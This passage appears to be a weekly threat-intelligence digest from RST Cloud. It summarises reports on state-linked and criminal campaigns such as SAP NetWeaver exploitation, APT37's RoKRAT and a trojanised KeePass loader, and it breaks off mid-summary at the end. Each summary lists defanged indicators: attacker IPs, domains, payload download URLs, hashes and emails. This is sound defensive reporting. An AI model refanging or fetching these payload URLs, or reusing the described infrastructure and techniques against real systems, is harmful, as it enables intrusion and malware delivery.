Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 49 threat intelligence reports and compiled a concise summary of each, along with the pertinent metadata extracted from them. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.Title: China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025–31324) to Target Critical InfrastructuresLink: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructuresSummary: In April 2025, advanced persistent threat (APT) groups linked to China, including UNC5221, UNC5174, and CL-STA-0048, executed targeted exploitation campaigns against critical infrastructure by exploiting a vulnerability in SAP NetWeaver (CVE-2025-31324) that allowed unauthenticated file uploads leading to remote code execution. Analysts found that the attackers performed reconnaissance on compromised SAP systems connected to industrial control networks, deploying Webshells and Rust-based malware, KrustyLoader, to maintain persistence and execute commands without detection. The groups strategically focused on essential services, particularly in sectors such as medical device manufacturing and government, aiming to gain high-privilege access to sensitive networks and highlighting significant risks to national and economic security through the exploitation of widely used enterprise applications.Threats: cl-sta-0048_campaign unc5221_group krustyloader unc5174_group snowlight vshell powershell_shell_tool sliver_c2_tool goreverse opendir_technique behinder connectwise_tool screenconnect_toolIndicators of compromise:-------------------------ip: 15[.]204[.]56[.]106, 43[.]247[.]135[.]53, 54[.]77[.]139[.]23, 3[.]248[.]33[.]252, 103[.]30[.]76[.]206, 45[.]155[.]222[.]14, 159[.]65[.]34[.]242, 138[.]68[.]61[.]82, 192[.]243[.]115[.]175, 107[.]175[.]77[.]118, 15[.]188[.]246[.]198, 138[.]197[.]40[.]133, 23[.]95[.]123[.]5, 215[.]204[.]56[.]106, 27[.]25[.]148[.]183, 65[.]20[.]81[.]172, 3[.]125[.]102[.]39, 212[.]11[.]64[.]225, 130[.]185[.]118[.]247, 212[.]192[.]15[.]213, 52[.]172[.]31[.]130, 149[.]62[.]46[.]132, 196[.]251[.]85[.]31, 162[.]248[.]53[.]119, 206[.]237[.]1[.]201, 141[.]164[.]35[.]53, 107[.]174[.]81[.]24, 208[.]76[.]55[.]39, 52[.]185[.]157[.]28, 65[.]49[.]235[.]210, 185[.]143[.]222[.]215, 185[.]165[.]169[.]31, 46[.]29[.]161[.]198, 62[.]234[.]24[.]38, 45[.]77[.]119[.]13, 23[.]227[.]196[.]204, 184[.]174[.]96[.]39, 96[.]9[.]124[.]89, 156[.]238[.]224[.]227, 153[.]92[.]4[.]236, 45[.]61[.]137[.]162, 64[.]95[.]11[.]95, 142[.]202[.]4[.]28, 154[.]37[.]221[.]237domain: sentinelones[.]com, aaa[.]ki6zmfw3ps8q14rfbfczfq5qkhq8e12q[.]oastify[.]com, applr-malbbal[.]s3[.]ap-northeast-2[.]amazonaws[.]com, abode-dashboard-media[.]s3[.]ap-south-1[.]amazonaws[.]com, brandnav-cms-storage[.]s3[.]amazonaws[.]comurl: http://43[.]247[.]135[.]53:10443, https://ocr-freespace[.]oss-cn-beijing[.]aliyuncs[.]com/2025/config[.]shhash: - sha256=3f14dc65cc9e35989857dc1ec4bb1179ab05457f2238e917b698edb4c57ae7ce, - sha256=0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579, - sha256=4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d, - sha256=63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd, - sha256=f92d0cf4d577c68aa615797d1704f40b14810d98b48834b241dd5c9963e113ec, - sha256=47ff0ae9220a09bfad2a2fb1e2fa2c8ffe5e9cb0466646e2a940ac2e0cf55d04, - sha256=91f66ba1ad49d3062afdcc80e54da0807207d80a1b539edcdbd6e1bf99e7a2ca, - sha256=c71da1dfea145798f881afd73b597336d87f18f8fd8f9a7f524c6749a5c664e4, - sha256=b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4fbbdd7668492de548b5df8, - sha256=5f3d1f17033d85b85f3bd5ae55cb720e53b31f1679d52986c8d635fd1ce0c08a, - sha256=2dcbb4138f836bb5d7bc7d8101d3004848c541df6af997246d4b2a252f29d51a, - sha256=00920e109f16fe61092e70fca68a5219ade6d42b427e895202f628b467a3d22e, - sha256=b9533ce8e428f16f3d0e1946f19a6f756ff11a532d0b7e61ae402837f46c678e, - sha256=888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef, - sha256=5e24b41a0bd076ec2b4e49e66daac94396c6180d00a45bcd7f4342a385fa1eedemail:Title: Korea National Security Strategy Think Tank Appanum APT37 Attack Case Analysis (Operation Name, Toy Box Story)Link: https://www.genians.co.kr/blog/threat_intelligence/toybox-storySummary: APT37, a North Korean hacking group, has executed sophisticated spear-phishing attacks targeting North Korean activists, leveraging Dropbox for distributing LNK files disguised as invitations to a fake event related to South Korea's national security. These LNK files, containing PowerShell scripts, facilitate the download and execution of malware associated with the "Rokrat" series, employing fileless techniques to evade detection by traditional antivirus systems. The group's strategic use of trusted cloud services for command and control communications complicates detection efforts, allowing APT37 to refine its methods without significant alterations to its malware code, thereby maintaining a persistent threat to its targets.Threats: toybox_story_campaign scarcruft_group spear-phishing_technique rokrat watering_hole_technique lolbin_techniqueIndicators of compromise:-------------------------ip: 89[.]147[.]101[.]65, 89[.]147[.]101[.]71, 37[.]120[.]210[.]2domain: cloud-api[.]yandex[.]neturl: https://api[.]dropboxapi[.]com/2/files/list_folder, https://content[.]dropboxapi[.]com/2/files/upload, https://content[.]dropboxapi[.]com/2/files/download, https://api[.]dropboxapi[.]com/2/files/deletehash: - md5=81c08366ea7fc0f933f368b120104384, - md5=723f80d1843315717bc56e9e58e89be5, - md5=7822e53536c1cf86c3e44e31e77bd088, - md5=324688238c42d7190a2b50303cbc6a3c, - md5=a635bd019674b25038cd8f02e15eebd2, - md5=beeaca6a34fb05e73a6d8b7d2b8c2ee3, - md5=d5d48f044ff16ef6a4d5bde060ed5cee, - md5=d77c8449f1efc4bfb9ebff496442bbbc, - md5=2f431c4e65af9908d2182c6a093bf262, - md5=7cc8ce5374ff9eacd38491b75cbedf89, - md5=8f339a09f0d0202cfaffbd38469490ec, - md5=46ca088d5c052738d42bbd6231cc0ed5email: ekta[.]sahasi@yandex[.]com, gursimran[.]bindra@yandex[.]com, sneha[.]geethakrishnan@yandex[.]com, tanessha[.]samuel@gmail[.]com, tianling0315@gmail[.]com, w[.]sarah0808@gmail[.]com, softpower21cs@gmail[.]com, sandozmessi@gmail[.]com, tiger[.]man[.]1999@mail[.]ruTitle: Analysis of APT37 Attack Case Disguised as a Think Tank for National Security Strategy in South Korea (Operation. ToyBox Story)Link: https://www.genians.co.kr/en/blog/threat_intelligence/toybox-storySummary: In March 2025, the North Korean state-sponsored hacking group APT37 launched a spear phishing campaign called "Operation: ToyBox Story," targeting North Korean activists by deceitfully promoting an academic forum. The attack utilized social engineering techniques, delivering malicious LNK files disguised within ZIP archives via Dropbox links. These LNK files executed hidden PowerShell commands upon extraction, deploying RoKRAT malware, which is adept at executing fileless attacks, collecting system data, and communicating with cloud-based command and control servers. The malware's operation included utilizing Dropbox for data exfiltration and employing encryption to obscure the transmitted information, alongside capabilities for real-time screenshot capture and remote command execution. APT37's tactics revealed a pattern of using similar behavioral signatures and leveraging public resources for malicious activities, emphasizing their adaptive strategies in cyber operations.Threats: toybox_story_campaign scarcruft_group spear-phishing_technique rokrat watering_hole_technique lolbin_techniqueIndicators of compromise:-------------------------ip: 89[.]147[.]101[.]65, 89[.]147[.]101[.]71, 37[.]120[.]210[.]2domain: api[.]dropboxapi[.]comurl: https://api[.]dropboxapi[.]com/2/files/list_folder, https://api[.]dropboxapi[.]com/2/files/deletehash: - md5=81c08366ea7fc0f933f368b120104384, - md5=723f80d1843315717bc56e9e58e89be5, - md5=7822e53536c1cf86c3e44e31e77bd088, - md5=324688238c42d7190a2b50303cbc6a3c, - md5=a635bd019674b25038cd8f02e15eebd2, - md5=beeaca6a34fb05e73a6d8b7d2b8c2ee3, - md5=d5d48f044ff16ef6a4d5bde060ed5cee, - md5=d77c8449f1efc4bfb9ebff496442bbbc, - md5=2f431c4e65af9908d2182c6a093bf262, - md5=7cc8ce5374ff9eacd38491b75cbedf89, - md5=8f339a09f0d0202cfaffbd38469490ec, - md5=46ca088d5c052738d42bbd6231cc0ed5email: rolf[.]gehrung@yandex[.]com, ekta[.]sahasi@yandex[.]com, gursimran[.]bindra@yandex[.]com, sneha[.]geethakrishnan@yandex[.]com, tanessha[.]samuel@gmail[.]com, tianling0315@gmail[.]com, w[.]sarah0808@gmail[.]com, softpower21cs@gmail[.]com, sandozmessi@gmail[.]com, tiger[.]man[.]1999@mail[.]ruTitle: Dont drop password managers (but password managers shouldnt drop malware)Link: https://labs.withsecure.com/content/dam/labs/docs/W_Intel_Research_KeePass_Trojanised_Malware_Campaign.pdfSummary: In February 2025, WithSecure identified a new trojanized malware loader named KeeLoader, linked to an Initial Access Broker with a history of high-profile ransomware attacks. The malware cleverly modified the legitimate KeePass password manager to include a Cobalt Strike beacon, using trusted certificates for distribution and evading detection by altering only minimal aspects of the original software. The attack employed non-traditional methods, such as rogue advertisements leading to inadvertent downloads, and involved a sophisticated operational infrastructure with multiple command and control domains, marking a significant evolution in ransomware tactics by leveraging well-known applications to facilitate credential theft and unauthorized access.Threats: cobalt_strike keeloader typosquatting_technique nitrogen credential_stealing_technique watering_hole_technique solana_private_keys_exfil_campaign rhadamanthys unc4696_group blackbasta blackcat akira_ransomware fakebat eugenfest_actor blackbasta_group batloader tramp_actor ta577_group ghost_pulse_actor belialdemon_group conti lockbitIndicators of compromise:-------------------------ip: 89[.]35[.]237[.]180domain: arch-online[.]com, aicmas[.]com, alldataservice[.]com, howupbusiness[.]com, howwupbusiness[.]com, brownlawwentura[.]com, saernsmith[.]com, seoinit[.]com, techbuildigital[.]com, keepass-info[.]aenys[.]com, aenys[.]com, sallimae-com-login[.]aenys[.]com, winscp-net-download[.]aenys[.]com, woodforest-login[.]aenys[.]com, phantom-wallet-com[.]aenys[.]com, dexscreener-com[.]aenys[.]com, pump-fun[.]aenys[.]com, pump-fun-official[.]aenys[.]com, keepassx[.]com, keegass[.]com, keebass[.]com, keepass-download[.]grmspace[.]com, keepass[.]biz, keepass-download[.]insightsforconsultancy[.]com, ghaithana[.]com, keepassnet[.]co, 1ba8d063-0[.]b-cdn[.]net, ghaithanad[.]com, winscp-net-download[.]aenyst[.]com, burleson-appliance[.]net, concord-appliance[.]com, desoto-appliance[.]net, resvat[.]com, zowhy[.]com, smakotin[.]com, protek-tech[.]com, laracusk[.]site, nestlingspace[.]com, animatedwebworks[.]com, precizeabrilliant[.]com, cadcamlabs[.]ru, prythera[.]com, insightsforconsultancy[.]com, roatarforrareason[.]com, aerynl[.]com, keeppaswrd[.]com, lvshilc[.]com, salliemae-com-login[.]aenys[.]com, takurjpo[.]com, larcausk[.]siteurl: https://ghaithana[.]com/wp-includes/assets/WinSCP-6[.]3[.]6-Setup[.]zip, https://lvshilc[.]com/KeePass-2[.]56-Setup[.]exe, https://keeppaswrd[.]com/download[.]php, https://arch-online[.]com/List/com2/9O29E3OIRSB8, https://aicmas[.]com/List/com2/9O29E3OIRSB8, https://aicmas[.]com/Apply/readme/VJICARU60DC?REDACTED=REDACTED, https://roatanforeachreason[.]com/wp-content/plugins/fix/TreeSizeFreeSetup[.]ziphash: - sha256=b51dc9ca6f6029a799491bd9b8da18c9d9775116142cedabe958c8bcec96a0f0, - md5=05c1f7dd747b1af79ac427a15a8b64ae, - sha256=0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8, - sha256=f1c6d8e594f85cd2cb844a3e8a90509ea137a67d7ef3f1b68a7be17df6ccac74, - sha256=0f6cfb62ed2f118c776a049b93e5d3e7b226f74e7b466c1cfed3c449ed23a42b, - sha1=f3082ca729aa81dc86dd70a87b75ed473b40bc15, - sha1=4676c643e6fbb17fcaefb46fc41a6b2b829e0efa, - sha256=83a13d14e1cbc25e46be87472de1956ac91727553bb3f019997467b2bab2658f, - sha256=128a68a7f412f6002f5e8e8cfe0bbae10cd2ffe63d30ac8acc0025b9659ce121, - sha256=128a68a714f2f6002f5e8e8cfe0bbae10cd2ffe63d30c8acc00255b9659ce121, - sha256=2c510f9ae4472342faafb7f2a1f278160f3581ead8ccd5b7ba7951863dcba2f5, - sha256=9cb3de5d5cc804235bd12c00ed45ec9d6116cc2c7523986dddb4d8643d54f5e5, - sha256=42d391dd7bfa4ea348ec1cd2620ea6458b37682f2b303e4a266e3d11a689f8ab, - sha256=3733b3be213ee4b959b70ff070b46e30b2785b14f1aecb74e0788dd00a1e1853, - sha256=83a13d14e1cbc25e46be087472de1956ac91727553bb3f0199974672bab2658f, - sha1=4d36c5325245186319d22bb933be4c9289fac559, - sha256=e5e919b97baa9f8d1084d09377b66699b66f50244d55de88e8726c5e983e78d8, - sha256=c6ed28cc576340b9f0e9324bef8c8c428bcd32c5234be73b885caa20549f332b, - sha256=a5e643c6cda31e0c7691dab58febe2efce0e98c33b19fe495b74b885de134a22, - sha256=2dd75a7f9948d794e95539b9a9ccc6a1488fb64dbe099fea401a13f98166d6ae, - sha256=5b48bbf2364f78812ea411ef41fb8b693a3965df13596b303e12f69908784d03, - sha256=fa3eca4d53a1b7c4cfcd14f642ed5f8a8a864f56a8a47acbf5cf11a6c5d2afa2, - sha1=2cf75dae1a87ca7962caf6727310420bbbc30588, - sha256=0000cff6a3c7f7eebc0edc3d1e42e454ebb675e57d6fc1fd968952694b1b44b3, sha1=d2984f9bf8f71cbbed61e44cd4f1e888a8f2a26a, md5=8b386b89e614d3084c1da3c28e324fb2, - sha1=7f931cda5a0e340e60506d7f9db801becc24bcc4, md5=c676acf4e16cc7cdd813c423b4824873, sha256=0fc4397d28395974bba2823a1d2437b33793127b8f5020d995109207a830761bemail: redacted@onionmail[.]comTitle: Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos RATLink: https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-ratSummary: Cybercriminals are increasingly leveraging PowerShell for stealthy attacks that bypass traditional antivirus defenses, particularly through the use of the Remcos Remote Access Trojan (RAT), which is notable for its extensive control over compromised systems. Recent attack patterns include the use of malicious LNK files disguised as Office documents, executed via mshta.exe, while a PowerShell-based loader, called "K-Loader," employs obfuscated VBScript within HTA files to facilitate the infection process. This loader downloads a heavily obfuscated PowerShell script that modifies system settings for persistence and uses sophisticated techniques, including process hollowing and direct memory execution, to evade detection and maintain operation, while continuously communicating with its command-and-control server.Threats: remcos_rat k-loader process_injection_technique process_hollowing_technique icmluautil_tool uac_bypass_techniqueIndicators of compromise:-------------------------ip: 193[.]142[.]146[.]101, 162[.]254[.]39[.]129domain: readysteaurants[.]com, readystearants[.]comurl: https://mytaxclientcopy[.]com/xlab22[.]htahash: - sha256=85dcc4bafccb5b9e255f75c2cd96fec1b4a5b30d09ae0d8eb571b312511d7df7, - sha256=ce5ee4a1991fa0a9030dc9e2e0601dc0f14c7961e6550921d8fd2cc4ec53a042, - sha256=ab8caac901b477c08934ec63978400eb369efb655114805ccba28c48272e5dad, - md5=bf32ff64ac0cfee67f4b2df27733576a, - md5=b63178f562b948b850f4676d4b8db1c0, - md5=dd7f049a4b573cc48e0412902a2c14b5email:Title: Unveiling Swan Vector APT Targeting Taiwan and Japan with varied DLL ImplantsLink: https://www.seqrite.com/blog/swan-vector-apt-targeting-taiwan-japan-dll-implants/Summary: The "Swan Vector" campaign, discovered by Seqrite Labs APT-Team, targets educational institutions and the mechanical engineering sector in East Asia, particularly Taiwan and Japan, with a sophisticated multi-stage malware ecosystem. Initially, the attack involves a malicious ZIP file that contains a shortcut file leading to the execution of a DLL implant called Pterois, which downloads additional payloads while disguising its activity under benign file names. The campaign progresses with the deployment of another implant, Isurus, which uses DLL sideloading techniques and direct memory manipulation to execute shellcode stealthily, showcasing operational tactics similar to previous APT groups like Winnti and Lazarus. The campaign's infrastructure is linked to East Asia, and further malicious activities related to applications like Python and One Drive are anticipated.Threats: swan_vector_campaign pterois isurus cobalt_strike lolbin_technique dll_sideloading_technique process_injection_technique winnti_group lazarus_group stone_panda_group spear-phishing_technique smuggling_techniqueIndicators of compromise:-------------------------ip: 52[.]199[.]49[.]4:7284domain: url: https://52[.]199[.]49[.]4:7284/jquery-3[.]3[.]1[.]min[.]js, https://52[.]199[.]49[.]4:7284/jquery-3[.]3[.]2[.]min[.]jshash: - md5=52407f3c97939e9c8735462df5f7457d, - md5=7c48240b065248a8e23eb02a44bc910a, - sha256=9c83faae850406df7dc991f335c049b0b6a64e12af4bf61d5fb7281ba889ca82, - sha256=7a942f65e8876aeec0a1372fcd4d53aa1f84d2279904b2b86c49d765e5a29d6f, - sha256=a9b33572237b100edf1d4c7b0a2071d68406e5931ab3957a962fcce4bfc2cc49, - sha256=8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd, - sha256=c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28, - sha256=e0c6f9abfc11911747a7533f3282e7ff0c10fc397129228621bcb3a51f5be980, - sha256=9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d, - sha256=e86feaa258df14e3023c7a74b7733f0b568cc75092248bec77de723dba52dd12, - sha256=9df9bb3c13e4d20a83b0ac453e6a2908b77fc2bf841761b798b903efb2d0f4f7, - sha256=e1b2d0396914f84d27ef780dd6fdd8bae653d721eea523f0ade8f45ac9a10faf, - sha256=777961d51eb92466ca4243fa32143520d49077a3f7c77a2fcbec183ebf975182, - sha256=040d121a3179f49cd3f33f4bc998bc8f78b7f560bfd93f279224d69e76a06e92, - sha256=c8ed52278ec00a6fbc9697661db5ffbcbe19c5ab331b182f7fd0f9f7249b5896, - sha256=7bf5e1f3e29beccca7f25d7660545161598befff88506d6e3648b7b438181a75, - sha256=de839d6c361c7527eeaa4979b301ac408352b5b7edeb354536bd50225f19cfa5email: swsanavector42@gmail[.]comTitle: Horabot Unleashed: A Stealthy Phishing ThreatLink: https://www.fortinet.com/blog/threat-research/horabot-unleashed-a-stealthy-phishing-threatSummary: In April, FortiGuard Labs discovered a new cyber threat named Horabot, targeting Spanish-speaking users through phishing emails that impersonate genuine invoices or financial documents. Upon opening malicious attachments, victims can have their email credentials stolen, enabling the malware to exploit Outlook's COM automation to propagate phishing messages from compromised accounts. Horabot employs advanced evasion techniques, including a combination of VBScript, AutoIt, and PowerShell, to conduct reconnaissance, steal information, and download additional malicious payloads while avoiding detection. It also gathers system information and sends it to the command and control server, allowing attackers to profile the infected systems and engage in further malicious activities, such as sending phishing emails and stealing sensitive credentials from web browsers.Threats: horabot_botnetIndicators of compromise:-------------------------ip: 209[.]74[.]71[.]168, 93[.]127[.]200[.]211domain: d1[.]webcorreio[.]pics, t4[.]contactswebaccion[.]store, f5[.]contactswebaccion[.]space, labodeguitaup[.]space, updatec[.]laturl: https://t4[.]contactswebaccion[.]store/0704, https://d1[.]webcorreio[.]pics/LNIJGPNIPPK/WWGDI[.], https://dl[.]webcorreio[.]pics/g1/[.], https://d1[.]webcorreio[.]pics/LNIJGPNIPPK/WWGDI, https://dl[.]webcorreio[.]pics/g1, https://d1[.]webcorreio[.]pics/g1/ctld/salvar[.]php[.], https://labodeguitaup[.]space/a/08/150822/au/au[.], http://209[.]74[.]71[.]168/on7all/index15[.]php[.], http://93[.]127[.]200[.]211/a/08/150822/au/logs/index[.]php?CHLG[.], https://labodeguitaup[.]space/a/08/150822/au/au, http://93[.]127[.]200[.]211/a/08/150822/auhash: - sha256=523d7e9005b2e431068130989caf4a96062a029b50a5455d37a2b88e6d04f83d, - sha256=84d77737196ea5a8cb0efd8fc3ea61a878d1e1851cc63bcb1e0868019c71996f, - sha256=13a5c60a799c104a7bb1ff1489b82031c2ea1ed10712ca019e996fc0e37e9dfa, - sha256=2ba471519bed0a5503408fee0593bc13547c88cfb10872a9739c2b1eaa5a287c, - sha256=a885b89bb145dde56f6b63fcbf3560fb7179df43df5d212217ca583405beceb8, - sha256=25be06643204fc7386db3af84b200d362c3287b30c7491b666c4fe821a8c6eb4, - sha256=5368f9f0994b28295aaf7d7af586d78827a95c6eb359a3921ebaa8d2fe1c98a9, - sha256=f7140c28921dcf9ac542965a37b5473432f39b34f00161b6f0c0f8af7c9551a5, - sha256=265a11951f6ac1fd1f150d2711e0158a59416dd709759b39904470f44c83272a, - sha256=370ccca7392282056f20b45829d0cac92acacfc07ab9699c54b3695649713854email:Title: More_Eggs? A Venom Spider Backdoor Targeting HRLink: https://denwp.com/more_eggs_venom_spider_phishing_campaign/Summary: The More_Eggs malware is a sophisticated JavaScript backdoor utilized by the financially motivated Venom Spider group, distributing its payloads primarily through Malware-as-a-Service (MaaS) targeting HR departments. A recent analysis of a sample, Sebastian Hall.zip, revealed that it employs heavily obfuscated mechanisms via a Windows shortcut (LNK) file, which executes a malicious command to initiate payload delivery through a seemingly benign batch script. This script can manipulate legitimate system files to mask its malicious actions while establishing command-and-control communications, utilizing tactics such as server-side polymorphism to generate unique payloads for each victim and evade detection by antivirus solutions.Threats: venom_spider_group more_eggs cobalt_group magecart_group polymorphism_technique lolbas_techniqueIndicators of compromise:-------------------------ip: domain: ajxdgb[.]com, rinehutche[.]com, bobyeism[.]com, vwrv[.]com, betystpen[.]com, katherinehstchens[.]com, larysimpex[.]com, jesicus[.]com, malent[.]com, lapustnei[.]com, ryanberad[.]com, sophip-lsacla[.]com, sophia-pascli[.]com, wfshtl[.]com, ryanberardi[.]com, municipiodechepo[.]org, w3[.]org[.]kz, moresecurity[.]kz, master[.]org[.]kz, gstatic[.]kz, monicabellucci[.]kz, voxcdn[.]kz, jasonlees[.]com, contactlistsagregator[.]com, onlinemail[.]kz, wp[.]org[.]kz, incapdns[.]kzurl: http://wfshtl[.]com/abf2iawq, http://sdda[.]ajxdgb[.]com/indsiq, http://ksf4hi[.]rinehutche[.]com/akeitebt, http://f93f4f[.]bobyeism[.]com/afgr, http://kabv[.]vwrv[.]com/asfh, http://dspr4a3s[.]betystpen[.]com/rkta, http://kagdikatherinehstchens[.]com/makeitbetter, http://s4[.]larysimpex[.]com/talkto, http://s9da[.]jesicus[.]com/rotuet, http://yrfgaf[.]malent[.]com/nosvwt, http://lkilljlapustnei[.]com/dbuiro, http://dtd[.]ryanberad[.]com/ikskck, http://tsfgad[.]sophip-lsacla[.]com/rocmanrold, http://sgad[.]sophia-pascli[.]com/rckandrol, http://doefstf[.]ryanberardi[.]com/ikskck, http://doefstf[.]ryanberardi[.]com, http://tool[.]municipiodechepo[.]org/id/243149, http://dtde[.]ryanberardi[.]com, http://dtde[.]ryanberardi[.]com/ikskck, https://beta[.]w3[.]org[.]kz/release/info, https://host[.]moresecurity[.]kz/host/info, https://developer[.]master[.]org[.]kz/api/v1, https://ssl[.]gstatic[.]kz/ui/v2, https://report[.]monicabellucci[.]kz/295693495/info, https://cast[.]voxcdn[.]kz/yui/yui-min[.]js, https://blog[.]jasonlees[.]com/latestnews/info, https://contactlistsagregator[.]com/j2378745678674623/ajax[.]php, https://onlinemail[.]kz/version44/info, https://stats[.]wp[.]org[.]kz/license[.]txt, https://api[.]incapdns[.]kz/v1hash: - sha256=4e18f606f7a31ffbea632ceaffad77689f810a3cde26d2a913d4530eaae5c5d1, - sha256=badf4752413cb0cbdc03fb95820ca167f0cdc63b597ccdb5ef43111180e088b0, - sha256=87039814b786611acb84475f4878ef3af24a8b413fde5049c8740c9aa1196520, - sha256=d769f87c5bd0145f84b22d0bd4dde5a997f13c7e96da7c989d9599b2a506f870, - sha256=679e88fe330c6115d61c3b90247abbdd7d90767b111b540545619d3e2acea1a6, - sha256=1d3274e435188565184a5350917b51739d39e06cd31acda341768f76d7bcf253, - sha256=3daaf6d4a7097f9c9ffca81e7973cb81df14d6bf1310ed1d470552b712b7dc43, - sha256=f11cec17a37fd445aa0b8e848a5a2df28d440feb01cc932b250c49fb567e1d4d, - sha256=9f940783a6bbeaca52308b32e7bc0060222f3705c2db2ab00f59c6615e5e577f, - sha256=785cbaa2284689b66b5da694572a63a5f9eadc6025fc469cf16f05fa0d0bb848, - sha256=33d28cf53f301c3822fac1114a5e33a294f78bd96c3fd632713b10392908bef4, - sha256=778610b950160fd39ea68580f9608112409448a547af08002f7e0803240a1996, - sha256=6af11403f02e15ff6932d17beb086502d363b3c63abbea3d2b920cae7e11f39f, - sha256=da345e36c86cc1725a716fd6b962033d357eddcfa62d79f232860bb1ce6b84e7, - sha256=140857e66f42f79466177b5192ee4e2419bafd1ada2f07d47b97fdadc5931fa6, - sha256=8227ff08d2002c748a952a564582ea7e5690539e8249e1a80344046495924b1b, - sha256=292df1f1d86877748bd68f0527549b3f18542ab1c88427f085a1bf61ed3253d4, - sha256=e64be0d513474fb0e8bd4a26ec94ee3dc7f46be40b12e84a89ed4ec619c117ae, - sha256=92d4aa7c390fd04205e717a4a44ab576e580523b9395677d95d3230d3951ca73, - sha256=1a5788add1dbf61df65d0015972831713a11825a09927d73e2711482668689e0, - sha256=a525e5d42676db2bf96741789c99f5cf081da81f33522622d57af9619a828e2f, - sha256=17acba8648b4f66d6b95cd771f1d0ce3ff391be3b8c3654577c4cc34827a9179, - sha256=fb138b9299a13f102bfc702dbecc009c401fde76336a5af56013260670df0770, - sha256=4f72736219813c74cf6b2938ebe418f1096908ce0716326d4b15be7e256e9a8e, - sha256=dcb804615a5e49ff885e29c351a81909f8c0217a083447b9defd5e8ca6181da2, - sha256=780dff3e79a06a8906270291a135fedeed445e3edb971303f4bce7d8dc320530, - sha256=b555d47fde39224c43f8a0334f9c7980abf9e55ed350f69465386754d7aef94b, - sha256=9072414c1df969a5f8e9893b01888050a42d275b1fe7b533d6a7d2e6b381fd1f, - sha256=0b2824fdc028b87ec68ed55bd91f4468d28499db06753924d4ed7064e2746f77, - sha256=0dedb76aab63ffa10e26ff47e4f2896aa16c3cafe7c3a3381326c0891ef8280e, - sha256=6c11d029a8b0e4cdb128557cba4a2e9066cd8ccf21c227a4e894133c2ecac4ab, - sha256=3b4430dab6baeb4e522222554232cb47980def23b88e5b6fec1b7299901738c6, - sha256=655cfdcc0a91ab5154fef802173048c596ac3aa8569faa082bdf7b24d719d73b, - sha256=c7b9b7cc41baf2098d0f555036da1d63b0188b7ba408ce4c471a6b55adb82b71, - sha256=7916aae8ff920efe8e473ae93eaf4197d96a9119830e99a084d8ee233fae10d7, - sha256=37e31f16d378d4a424c89aed47407f201b888f587660a8aefd86712d8071c051, - sha256=36c7102a85dae4caec04a4f467f409e0c9b45914e70ec37f112133e615b39495, - sha256=34e92605322f5830f94b7aae9f0478c26f5fe5173c742defd77fe379523004b3, - sha256=6564f50797b67698d68c797703a72f7e17c01b54f28366a84e49394e081f9186, - sha256=e7d4aca300ef08c184493ce4b32591ee06803949c4262e5c3dc13793156977ad, - sha256=e5c90c5bae489537a67aa50072913d58b0ae1c57c65af7e51282a2bc4c38dad0, - sha256=4c294298237e1fc6bfdd74f71ae87fc68aa050e8da8307544491ed1f80b886f9, - sha256=2da260994d3b023737630e2df606b2b6379d445fbc0eadce2d15e609ad34e6e7, - sha256=84e1f51c2d5070fc4e6d9e3d18a02097e11e95f56932a1c4a75f87a12c2410e4, - sha256=4ac5d743daacb86ff493770c062e46ad34a271099d578b71db5449efe459b278, - sha256=c04d9607c155d7cb228f982017ba3879c166d870613c01707757bbbe977f271c, - sha256=6f341b9a193f1a993d3c161430c40ead5512c539f28a8f68404d05897522a059, - sha256=499815559568ab0684e6f6b68180347da32faf76258da3e5e2d7c6839c9b1020, - sha256=c010186c48c061edc64e8880f9857964bc32223da51f5c64aea4ba6cac052047, - sha256=442a9a31c8b77527f758dc87d8ff9708dc2ee48d62aae6624da295714c8e97bc, - sha256=0f37a11bccb0eede315fb36b35ab6a7d5fa5ca026ccc24ae0e8a87606b828861, - sha256=cf4e81998c42ed2eba64004c76c42213d40744088e5f6cf825ee877e6882c49a, - sha256=8861228979a7cc7d3a8c399cc34f063b7f34759f5e2ae44a3a0d0b53204ee4ff, - sha256=e1b4911959b6ca0db40873983e1f9d76e637818cb05d74e70b83701a5f4f4ef4, - sha256=60af732fa31e8685f467ad1b6e99e9cce50e19ad5758cf6ef04f4d70bbaa69ca, - sha256=cbe1f43ad7a19c97a521a662dd406a3fb345ae919271cefc694a71e55fe163f5, - sha256=dc8727083a4663a810525915039d21733f1fbca2926aeeb19f0815ef849f3056, - sha256=ad24f84494145758b811cb422fe417aa08a55a4a81bf82918487bda3dc6e431d, - sha256=3e96313a5ed1cf05bad938c8337fcfc2bb5671eb071fb467c831c7fa43e2202f, - sha256=7ce58900fc2d2a5378e9c1952a64f7d48b8592b6efb7bd4efeea9c42563d3b9b, - sha256=d88ab33ce36b147866a0e21f5ced616d64548e21cceb621ddb3c78ce7faf8e39, - sha256=068c1b1ce0830254ab9c347e77a33e9df027f17b098aba8d0c1c97d9e1625429, - sha256=ea5a0e1c58a64c73110fa6fc3e455bbe623fd37b7c28d26a94cb522fd2924720email:Title: Operation RoundPressLink: https://www.welivesecurity.com/en/eset-research/operation-roundpress/Summary: ESET researchers have uncovered Operation RoundPress, a cyber espionage effort linked to the Russia-aligned Sednit group (APT28 or Fancy Bear), targeting webmail servers to siphon sensitive data from high-profile accounts. Utilizing Cross-Site Scripting (XSS) vulnerabilities, notably CVE-2020-35730 in Roundcube and new flaws in Zimbra and MDaemon in 2024, the group employs spearphishing techniques to inject malicious scripts. The operation's payloads—SpyPress variants—are designed to steal credentials and exfiltrate contacts, with SpyPress.MDAEMON capable of bypassing two-factor authentication. The researchers note that techniques may be borrowed from other threat groups, and the unpatched vulnerabilities present a significant risk to organizations, particularly amid ongoing 